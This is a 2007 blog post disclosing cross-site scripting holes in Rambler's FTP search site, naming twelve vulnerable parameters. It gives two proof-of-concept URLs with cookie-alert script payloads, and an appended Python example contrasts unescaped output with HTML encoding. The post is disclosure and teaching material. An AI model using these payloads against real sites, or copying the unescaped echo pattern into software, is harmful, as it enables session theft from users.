MOSEB-09 Bonus: Vulnerabilities at ftpsearch.rambler.ru
22:57 09.06.2007
New bonus vulnerabilities at Rambler. I found these Cross-Site Scripting holes on 01.06.2007. I found them when I looked for other holes for the project, after Rambler untimely fixed some that I had prepared. Rambler needs to behave itself properly (when participating in the project).
The holes at Rambler-FTP (ftpsearch.rambler.ru) are in search results and advanced settings. These are XSS vulnerabilities like those in MOSEB-09: Vulnerabilities at Rambler (total 12 new holes).
Search results (search.html).
XSS:
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- redirector
- html injection
The vulnerabilities are in the words, ftype, form, what and sort1 parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Advanced settings (advanced.html).
XSS:
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- redirector
- html injection
The vulnerabilities are in the words, pflx, pfli, dflx, dfli, sl and sh parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/advanced.html?words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Moral: searching on ftp can be dangerous.
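The flaw class behind both links above, seen from the fixing side, as an added example (not code from the original post or from Rambler). The template that echoes a parameter back into an input field and all function names are assumptions; the parameter names and the two URLs are the ones quoted above.

```python
from html import escape
from urllib.parse import urlsplit, parse_qs

# The two links quoted in the post.
POC_URLS = [
    "http://ftpsearch.rambler.ru/db/ftpsearch/search.html"
    "?words=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://ftpsearch.rambler.ru/db/ftpsearch/advanced.html"
    "?words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
]

# Parameters the post lists as affected, per script (5 + 7 = 12).
PARAMS = {
    "search.html": ["words", "ftype", "form", "what", "sort1"],
    "advanced.html": ["words", "pflx", "pfli", "dflx", "dfli", "sl", "sh"],
}


def poc_value(url):
    """URL-decode the `words` value, as the server sees it after parsing."""
    return parse_qs(urlsplit(url).query)["words"][0]


def render_unsafe(name, value):
    """Assumed vulnerable pattern: the decoded value is echoed unchanged."""
    return f'<input name="{name}" value="{value}">'


def render_safe(name, value):
    """Hardened pattern: encode & < > " ' before writing into the markup."""
    return f'<input name="{name}" value="{escape(value, quote=True)}">'


def unencoded_params(render, payload):
    """Return (script, parameter) pairs whose output contains the payload verbatim."""
    return [(script, name)
            for script, names in PARAMS.items()
            for name in names
            if payload in render(name, payload)]


if __name__ == "__main__":
    for url in POC_URLS:
        value = poc_value(url)
        print("decoded:", value)
        print("unsafe :", len(unencoded_params(render_unsafe, value)), "of 12 echo it raw")
        print("safe   :", render_safe("words", value))
```

With encoding applied at output, the quote and angle brackets arrive in the page as entities, so the value stays inside the attribute for every one of the 12 parameters.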
Wednesday, 15:10 13.06.2007
Thanks!
Wednesday, 16:38 13.06.2007
Alex
You are welcome.